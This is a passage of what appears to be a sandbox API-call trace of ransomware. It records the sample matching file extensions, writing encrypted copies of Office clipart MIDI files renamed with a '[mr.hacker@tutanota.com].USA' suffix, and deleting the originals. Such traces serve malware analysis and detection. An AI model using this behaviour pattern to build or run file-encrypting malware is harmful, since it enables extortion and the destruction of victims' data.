Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString=".dbf") returned 4 [0268.771] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString=".1cd") returned 4 [0268.771] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString=".jpg") returned 4 [0268.771] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString=".doc") returned 4 [0268.771] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.771] lstrlenW (lpString=".docx") returned 5 [0268.771] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0268.771] lstrlenW (lpString=".pdf") returned 4 [0268.771] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.771] lstrlenW (lpString=".xls") returned 4 [0268.771] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.771] lstrlenW (lpString=".xlsx") returned 5 [0268.771] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0268.771] lstrlenW (lpString=".ppt") returned 4 [0268.771] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.771] lstrlenW (lpString=".zip") returned 4 [0268.771] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.771] lstrlenW (lpString=".rar") returned 4 [0268.771] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.771] lstrlenW (lpString=".bz2") returned 4 [0268.771] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.771] lstrlenW (lpString=".7z") returned 3 [0268.772] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.772] lstrlenW (lpString=".dbf") returned 4 [0268.772] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.772] lstrlenW (lpString=".1cd") returned 4 [0268.772] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 63 [0268.772] lstrlenW (lpString=".jpg") returned 4 [0268.772] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.772] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.772] lstrlenW (lpString="ROAD_01.MID") returned 11 [0268.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.773] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=5983) returned 1 [0268.773] CloseHandle (hObject=0x37c) returned 1 [0268.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 0x20 [0268.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.773] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.773] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0268.773] GetLastError () returned 0x0 [0268.773] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x175f, lpOverlapped=0x0) returned 1 [0268.776] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1760, lpOverlapped=0x0) returned 1 [0268.776] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.777] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0268.777] SetEndOfFile (hFile=0x328) returned 1 [0268.777] CloseHandle (hObject=0x328) returned 1 [0268.777] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.777] SetEndOfFile (hFile=0x37c) returned 1 [0268.779] CloseHandle (hObject=0x37c) returned 1 [0268.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 1 [0268.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.779] lstrlenW (lpString=".doc") returned 4 [0268.779] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.779] lstrlenW (lpString=".docx") returned 5 [0268.779] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.779] lstrlenW (lpString=".pdf") returned 4 [0268.779] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.779] lstrlenW (lpString=".xls") returned 4 [0268.779] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.779] lstrlenW (lpString=".xlsx") returned 5 [0268.779] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.779] lstrlenW (lpString=".ppt") returned 4 [0268.779] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString=".zip") returned 4 [0268.780] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.780] lstrlenW (lpString=".rar") returned 4 [0268.780] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.780] lstrlenW (lpString=".bz2") returned 4 [0268.780] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.780] lstrlenW (lpString=".7z") returned 3 [0268.780] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString=".dbf") returned 4 [0268.780] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString=".1cd") returned 4 [0268.780] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString=".jpg") returned 4 [0268.780] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.780] lstrlenW (lpString=".doc") returned 4 [0268.780] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.780] lstrlenW (lpString=".docx") returned 5 [0268.780] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.780] lstrlenW (lpString=".pdf") returned 4 [0268.780] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.780] lstrlenW (lpString=".xls") returned 4 [0268.780] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.780] lstrlenW (lpString=".xlsx") returned 5 [0268.780] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.781] lstrlenW (lpString=".ppt") returned 4 [0268.781] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.781] lstrlenW (lpString=".zip") returned 4 [0268.781] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.781] lstrlenW (lpString=".rar") returned 4 [0268.781] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.781] lstrlenW (lpString=".bz2") returned 4 [0268.781] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.781] lstrlenW (lpString=".7z") returned 3 [0268.781] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.781] lstrlenW (lpString=".dbf") returned 4 [0268.781] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.781] lstrlenW (lpString=".1cd") returned 4 [0268.781] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0268.781] lstrlenW (lpString=".jpg") returned 4 [0268.781] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.781] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.781] lstrlenW (lpString="SAFRI_01.MID") returned 12 [0268.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.783] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=10122) returned 1 [0268.783] CloseHandle (hObject=0x37c) returned 1 [0268.783] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 0x20 [0268.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.784] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.784] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.786] GetLastError () returned 0x0 [0268.786] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x278a, lpOverlapped=0x0) returned 1 [0268.789] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x2790, lpOverlapped=0x0) returned 1 [0268.790] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.790] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.790] SetEndOfFile (hFile=0x388) returned 1 [0268.790] CloseHandle (hObject=0x388) returned 1 [0268.790] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.790] SetEndOfFile (hFile=0x37c) returned 1 [0268.792] CloseHandle (hObject=0x37c) returned 1 [0268.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid")) returned 1 [0268.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.793] lstrlenW (lpString=".doc") returned 4 [0268.793] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.793] lstrlenW (lpString=".docx") returned 5 [0268.793] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.793] lstrlenW (lpString=".pdf") returned 4 [0268.793] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.793] lstrlenW (lpString=".xls") returned 4 [0268.793] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.793] lstrlenW (lpString=".xlsx") returned 5 [0268.793] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.793] lstrlenW (lpString=".ppt") returned 4 [0268.793] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.793] lstrlenW (lpString=".zip") returned 4 [0268.793] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.793] lstrlenW (lpString=".rar") returned 4 [0268.793] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.793] lstrlenW (lpString=".bz2") returned 4 [0268.793] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.793] lstrlenW (lpString=".7z") returned 3 [0268.793] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.793] lstrlenW (lpString=".dbf") returned 4 [0268.793] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.793] lstrlenW (lpString=".1cd") returned 4 [0268.794] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.794] lstrlenW (lpString=".jpg") returned 4 [0268.794] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.794] lstrlenW (lpString=".doc") returned 4 [0268.794] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.794] lstrlenW (lpString=".docx") returned 5 [0268.794] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.794] lstrlenW (lpString=".pdf") returned 4 [0268.794] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.794] lstrlenW (lpString=".xls") returned 4 [0268.794] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.794] lstrlenW (lpString=".xlsx") returned 5 [0268.794] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.794] lstrlenW (lpString=".ppt") returned 4 [0268.794] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.794] lstrlenW (lpString=".zip") returned 4 [0268.794] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.794] lstrlenW (lpString=".rar") returned 4 [0268.794] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.794] lstrlenW (lpString=".bz2") returned 4 [0268.794] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.794] lstrlenW (lpString=".7z") returned 3 [0268.794] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.795] lstrlenW (lpString=".dbf") returned 4 [0268.795] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.795] lstrlenW (lpString=".1cd") returned 4 [0268.795] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 63 [0268.795] lstrlenW (lpString=".jpg") returned 4 [0268.795] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.795] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.795] lstrlenW (lpString="SCHOL_02.MID") returned 12 [0268.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.797] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=5058) returned 1 [0268.797] CloseHandle (hObject=0x388) returned 1 [0268.797] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 0x20 [0268.797] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.797] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.797] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0268.798] GetLastError () returned 0x0 [0268.798] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x13c2, lpOverlapped=0x0) returned 1 [0268.802] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x13d0, lpOverlapped=0x0) returned 1 [0268.803] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.803] WriteFile (in: hFile=0x328, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.803] SetEndOfFile (hFile=0x328) returned 1 [0268.803] CloseHandle (hObject=0x328) returned 1 [0268.803] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.803] SetEndOfFile (hFile=0x388) returned 1 [0268.807] CloseHandle (hObject=0x388) returned 1 [0268.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.807] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 1 [0268.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.807] lstrlenW (lpString=".doc") returned 4 [0268.807] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.807] lstrlenW (lpString=".docx") returned 5 [0268.807] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0268.807] lstrlenW (lpString=".pdf") returned 4 [0268.807] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.807] lstrlenW (lpString=".xls") returned 4 [0268.807] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.808] lstrlenW (lpString=".xlsx") returned 5 [0268.808] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0268.808] lstrlenW (lpString=".ppt") returned 4 [0268.808] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString=".zip") returned 4 [0268.808] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.808] lstrlenW (lpString=".rar") returned 4 [0268.808] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.808] lstrlenW (lpString=".bz2") returned 4 [0268.808] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.808] lstrlenW (lpString=".7z") returned 3 [0268.808] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString=".dbf") returned 4 [0268.808] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString=".1cd") returned 4 [0268.808] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString=".jpg") returned 4 [0268.808] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.808] lstrlenW (lpString=".doc") returned 4 [0268.808] lstrcmpiW 